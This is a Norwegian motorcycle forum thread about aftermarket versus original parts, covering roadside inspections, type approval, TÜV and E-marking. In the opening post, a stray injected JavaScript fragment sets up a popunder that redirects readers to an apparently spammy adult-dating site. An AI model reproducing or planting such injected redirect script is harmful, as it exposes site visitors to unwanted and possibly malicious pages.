Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

... om deler, tilbehør, utstyr, renhold, MC-forsikring, kjøreklær osv. til MC, fører og passasjer.
Brukeravatar
AJ
Administrator
Innlegg: 37877
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av AJ »

Det var et interessant innlegg Fredrik24 kom med i en annen tråde her i "Utstyrsveggen..." forumet:

https://www.mcsiden.no/viewtopic.php?p=376941#p376941

Det fikk meg til å sjekke om om det er en egen tråd her på MCsiden.no om synspunkter på bruk av uoriginale erstatningsdeler.
Fant ingen slik tråd.
Derfor opprettes denne. Men ikke bare derfor. Også fordi det antakelig blir mer fokus på disse tingene framover fra de som stopper og kontrollerer oss langs veien her hjemme og i utlandet, som altså denne videoen i innlegget ovenfor viser:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Antakelig ikke unaturlig at man nedover på kontinentet har mer fokus på disse tingene enn her i landet med tanke på mer trafikk og høyere hastigheter, som i Tyskland. Som f.eks. når det gjelder speil, slik det påpekes i dette innlegget i annen tråde her inne:

https://www.mcsiden.no/viewtopic.php?p=315402#p315402

Speil, hendler, eksospotter og anlegg og kanskje også fotpinner (pegs) fra både anerkjente ettermarkedsprodusenter og såkalte "unbranded" produserte til ukjente merkenavn, vil trolig bli sjekket nøye av kontrollører vi møter i tiden framover.

Og det er vel trolig slik at disse ettermarkedsprodusentene nepper sjekker kvalitet og robusthet på samme måte som MC-produsentene og deres utstyrslevendører gjør.

Selv har jeg byttet ut de originale sidespeilene på KTM'en med samme type som BMW, Aprilia og Moto Guzzi har, som de eneste originaldelene jeg har byttet ut.
Regner med at disse går glatt gjennom en speilkontroll om jeg skulle havne i en slik ute i det store utland... ;) .

Uansett, hva mener MCsidister her inne om å erstatte vitale originaldeler med ettermarkedsprodukter av ymse kjente og ukjente merker - hvor lurt er det egentlig, tro :scratch ?
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
FredrikE24
Innlegg: 4717
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av FredrikE24 »

For min del synes jeg speil og hendler er OK på BMWen jeg kjører så det er greit. Aldri hatt problemer med originalhendler heller.

Samme gjelder lys, reflekser, skilt. Gidder ikke lage meg problemer. Eksosen jeg kjører med er et problem. Innenlands tar jeg sjansen. Drar jeg ut av Norge er det originalanlegg på først. Det er ingen bønn nedover i Europa hvertfall. Som man ser på videoen må duden levere hendlene til politimannen før han får dra avgårde.

Her på berget er alt slikt liten risiko. Etaten har generelt lite peiling på alt mulig. Kulturen i Norge er også slik at man kan se mellom linjene på ting. Sånn er det bla. Ikke i Tyskland. Der er kulturen en helt annen. Man blir behandlet ganske kraftig når man er så respektløs at man bryter enkle regler. Det er jo ikke så vanskelig å følge reglene sier de da, og ser oppgitt på deg.
Sist redigert av FredrikE24 den 24 apr 2020, 17:35, redigert 2 ganger totalt.

Brukeravatar
oivindg
Innlegg: 885
Registrert: 20 nov 2019, 21:45
Motorsykkelen din: BMW R1200R (2011)
Sted: Kongsberg

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av oivindg »

Spennende tema. Fra bilverdenen har jeg i alle fall observert at det kan være stor forskjell på kvalitet og testing mellom de ulike produsentene. Mange av de kjente produsentene har like gode design og like god kvalitet som originaldeler, mens ukjente merker kan være total gambling å bruke. Er det kritiske deler bør TÜV-godkjenning være tilstrekkelig bevis på at det er trygge deler.
Øivind

Min 2011 BMW R1200R - 2021 blir første hele sesong med lappen. Gleder meg!

BlåBil
Innlegg: 121
Registrert: 28 jun 2019, 00:07
Motorsykkelen din: Dyna

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av BlåBil »

Vet ihvertfall at her i Norge så kan myndighetene være harde på dempere på biler, de skal være TUV godkjente.
Styrer på sykler har jeg sett en tysk youtuber snakke om da han måtte skifte sitt protaper styre til et TUV godkjent styre.

Tatt fra wikipedia
TÜV (Technischer Überwachungs-Verein, norsk: teknisk overvåkingsforening) er en sammenslutning av tyske selskaper som foretar sikkerhetskontroller på teknisk utstyr og godkjenner dette. Som regel dreier det seg om sikkerhetsstandarder som er fastlagt i lovverket, som for eksempel for kjøretøy som skal brukes i offentlig trafikk.

Slik tysk godkjenning er automatisk også godkjent i Norge. I dagligtale snakker man ofte om TUV-godkjenning også om deler som ikke er godkjent i Tyskland[trenger referanse], mest typisk deler som er godkjent av Statens vegvesen.
Sykkelen min har en del uoriginale deler, og de fleste deler er fra statene, så jeg tviler på at jeg får kjørt lovlig i Tyskland :-k
Her gjelder det så å si alt utenom motoren :redface

Brukeravatar
FredrikE24
Innlegg: 4717
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av FredrikE24 »

Harde på dempere på biler?
Tenker du på senking?

Brukeravatar
AJ
Administrator
Innlegg: 37877
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av AJ »

Når det gjelder uoriginale hendler av ukurante merker og merkeløse produsenter så har det vel hendt at disse har sviktet når det gjelder som mest... :-k . Mener å ha lest om dette på nettet, men om det er en skapt vandrehistorie eller reelt skal jeg ikke uttale meg bastant om.
Men om hendelsen svikter, eksempelvis knekker, i en kritisk situasjon kan jo dette ende fatalt...

Uoriginale speil av billig tvilsom kvalitet, som rister løs under kjøring i høy fart er vel heller ikke noen opplevelse å trakte etter.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
kjellv
Moderator
Innlegg: 6956
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av kjellv »

Nå er det slik at politi og SVV rett som det er har utekontroller her i landet også. Når de setter opp en slik kontroll, har den oftest et forhåndsbestemt tema som det fokuseres spesielt på. Det kan være for eksempel setebelte og mobiltelefonbruk, da sitter det en i veikanten med kikkert og ser deg lenge før du ser dem. De kan ha tema promille, det kan være lysutstyr og lysbruk, det kan være dekk eller teknisk kontroll.
De har også kontroller med spesielt fokus på MC, da kanskje særlig lett-mc. Slik er det i allefall i området her jeg bor, Molde og Kristiansund. De er rimelig rigide på regelverket slik jeg ser det. De vet hva det er når de ser et eksosanlegg, og de ser om DB-killer står i. De kjenner igjen et bar-end speil, og synes ikke noe særlig om blå parklyspærer. De ser også om dekkene har riktig dimensjon og om de er slitt. De liker heller ikke at skiltet ikke har riktig vinkel slik at de ikke ser hva som står på det. De har også fokus på lys og hendler. De har med datamaskin og slår opp typegodkjenningen via reg.nr. der de blant annet ser dekkdimensjoner og hvor mange speil sykkelen er godkjent med og hvor mange ccm hvert speil skal ha. Jeg har aldri hørt om at de er med på å diskutere hva som er best av originale speil eller små bar-end speil, det er typegodkjenningen de bryr seg om. Mange sykler har også en liten etikett som forteller hvor mange tenner det er på for- og bakdrev. De ser på sin datamaskin om sykkelen har en slik etikett og hvor den står hen. I fjor bestilte jeg 4 slike etiketter til Yamaha WR125X for kunder som har blitt stoppet og blitt gitt en frist for å vise sykkelen med etiketten på.
Finner de noe som ikke stemmer, gir de en frist for etterkontroll hos SSV. Der er det bare å bestille time, møte opp og betale for den. Er ikke sykkelen innenfor typegodkjenning har du et problem.

Brukeravatar
JanK
Innlegg: 719
Registrert: 28 mar 2011, 12:52
Motorsykkelen din: mcimport.it
Sted: Milano, Italia
Kontakt:

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av JanK »

Nå kan ikke jeg tysk så jeg vet ikke hva de nevnte i videoen, men;

Så lenge delene er e-merket (ekte, ikke fake), er det ikke noe problem, i norge eller andre steder i Europa inkludert Tyskland.

Brukeravatar
dypen
Innlegg: 5277
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av dypen »

oivindg skrev: 24 apr 2020, 17:34 Spennende tema. Fra bilverdenen har jeg i alle fall observert at det kan være stor forskjell på kvalitet og testing mellom de ulike produsentene. Mange av de kjente produsentene har like gode design og like god kvalitet som originaldeler, mens ukjente merker kan være total gambling å bruke. Er det kritiske deler bør TÜV-godkjenning være tilstrekkelig bevis på at det er trygge deler.
Må ikke glemme det er mange produsenter som produserer til bilfabrikker, det vi får kjøpt som alternative deler kan være samme del som originaldelene men i annen forpakning og i noen tilfeller er bilnavnet slipt bort eller ikke stanset / støpt. Eneste forskjell er leverandør og pris.

Hvordan markedet er på motorsykkel deler vet jeg ikke men til klassiske motorsykler som ex CB750 og Z900 produseres det deler i Asia som ex eksos bensintanker felgringer seter setetrekk osv der OEM deler ikke kan skaffes eller NOS deler koster det hvite.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

BlåBil
Innlegg: 121
Registrert: 28 jun 2019, 00:07
Motorsykkelen din: Dyna

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av BlåBil »

FredrikE24 skrev: 24 apr 2020, 18:47 Harde på dempere på biler?
Tenker du på senking?
Harde = strenge. Det at bilen er senka/hevet er mer merkbart enn en bil med standard lengde men uoriginale dempere.
JanK skrev: 24 apr 2020, 19:29 Nå kan ikke jeg tysk så jeg vet ikke hva de nevnte i videoen, men;

Så lenge delene er e-merket (ekte, ikke fake), er det ikke noe problem, i norge eller andre steder i Europa inkludert Tyskland.
Tyskere har en annen standard.

mekkern
Innlegg: 7589
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av mekkern »

Originalhendlene på hondaen har ingen typegodkjenning :prf
Havnet i dokumentkontroll med min «justerte» xl600R ved Tyrigrava. Etter en halvtime med pc og div samtaler med kollegane sime så ble konklusjonen at jeg manglet fothvilere bak. :roll Avvik fra regdata. Ikke så rart da jeg hadde sveist om til fothvilere lengre bak og ikke plass til 4 bein.
. Forøvrig bare et barend speile på venstre side. Og defekt frontpære var ikke intressant.

Reiste ned på SVV og omregget til 1 sitteplass uten dikkedarier.
Men 125ccm der er det masse «begrensninger»

Edit.
For morro skyld så tok jeg en titt på FTR`n.
Speilene ha E merking men det sitter et protaper fatbar styre originalt og bremsehendlen har bare en støpedatorose.- forøvrig en Brembopumpe.clutchen har også bare en støpedatorose.

Så hva tyskerne skal se på hendlene mine aner jeg ikke...
Sist redigert av mekkern den 24 apr 2020, 20:28, redigert 1 gang totalt.
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Brukeravatar
Geiroe
Innlegg: 861
Registrert: 29 jul 2013, 21:12
Motorsykkelen din: Honda VF1000F2 (85)
Sted: Sandefjord

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av Geiroe »

På eldre kjøretøy finnes ikke typegodkjenning lett tilgjengelig på pc, eldre enn 71 finnes ikke, så HD folket går klar med eldre ombygde HD'er. Da kommer skjønn og erfaring inn, og sistnevnte kategori har vel gått over i pensjonistenes rekker.
For egen husk. Dekkskift PR3, service 103650

Brukeravatar
JanK
Innlegg: 719
Registrert: 28 mar 2011, 12:52
Motorsykkelen din: mcimport.it
Sted: Milano, Italia
Kontakt:

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av JanK »

BlåBil skrev: 24 apr 2020, 19:51
JanK skrev: 24 apr 2020, 19:29 Nå kan ikke jeg tysk så jeg vet ikke hva de nevnte i videoen, men;

Så lenge delene er e-merket (ekte, ikke fake), er det ikke noe problem, i norge eller andre steder i Europa inkludert Tyskland.
Tyskere har en annen standard.
Selv om de har TUV i Tyskland betyr ikke det at E homologasjon ikke er nok. SC-Project sine e-merkede eksosanlegg er har også TUV godkjenning. Rizoma sine e-merkede speil selges i Tyskland, ville vært tilgjengelige der hvis de var ulovlige for gatebruk.

BlåBil
Innlegg: 121
Registrert: 28 jun 2019, 00:07
Motorsykkelen din: Dyna

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av BlåBil »

Nemlig, de har tuv. Selv rizoma har tuv godkjenning.

Nå valgte jeg bare ut et random speil fra rizoma.

https://www.rizoma.com/webobjrizoma/TUV ... _BS232.pdf

mekkern
Innlegg: 7589
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Erstatte originaldeler med uoriginale ettermarkedsdeler - hvor lurt er det egentlig?

Legg inn av mekkern »

Pokker å vanskelig disse nettbretta er på tastene da..... lever plutslig eget liv... :evil

Ece/ E merking overkjører TUV og dermed er det TUV godkjent også.
Samme i Norge.

Som det sto på rizoma speilet- E merkingen E1 øverst på TUV papiret.
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Svar